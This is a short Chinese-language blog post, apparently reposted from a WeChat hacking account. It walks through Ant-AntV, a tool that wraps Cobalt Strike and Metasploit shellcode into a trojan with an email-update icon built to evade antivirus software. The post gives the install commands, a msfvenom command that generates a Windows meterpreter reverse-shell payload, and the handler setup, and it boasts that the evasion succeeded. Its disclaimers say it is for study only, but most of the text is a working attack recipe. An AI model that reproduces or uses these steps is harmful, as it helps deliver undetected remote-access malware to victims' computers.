本文我们来介绍一款在
Cs和Msf中较好的免杀工具吧。
注意: 本文仅供学习和研究。在了解技术和原理的前提下。更好的保护个人信息安全。反对一切危害网络安全的行为!造成法律后果与本文无关。
环境
-
Kali Linux -
python3.8
安装
git clone https://github.com/shellfeel/Ant-AntV
cd Ant-AntV
pip install -r requirements.txt
生成shellcode
这里我们以cs为例。生成.bin格式的。
将生成的shellcodebeacon.binbean_rawicomail_update.icogen_trojan.py 48行形参out_file_name 来更改,这个参数本身也是生成的程序名)放入resource目录 执行下面命令进行打包程序。
python gen_trojan.py
打包完成后,效果如下
msf
生成shell
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.12.22 LPORT=5555 -f raw -o 1.bin
利用上述同样的方式进行处理 配置msf
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.123.33
set LPORT 5555
exploit
免杀效果
(再此特别感谢群内小伙伴的测试!😘😘😘)
Cs成功上线
总结
使用随机密钥(混淆加密、shellcode加密),所以每次生成的程序都是全新的,避免被杀软散列标记导致全部失效。支持反沙箱逻辑、支持混淆、支持upx压缩。
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):Msf Cs通用免杀项目
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论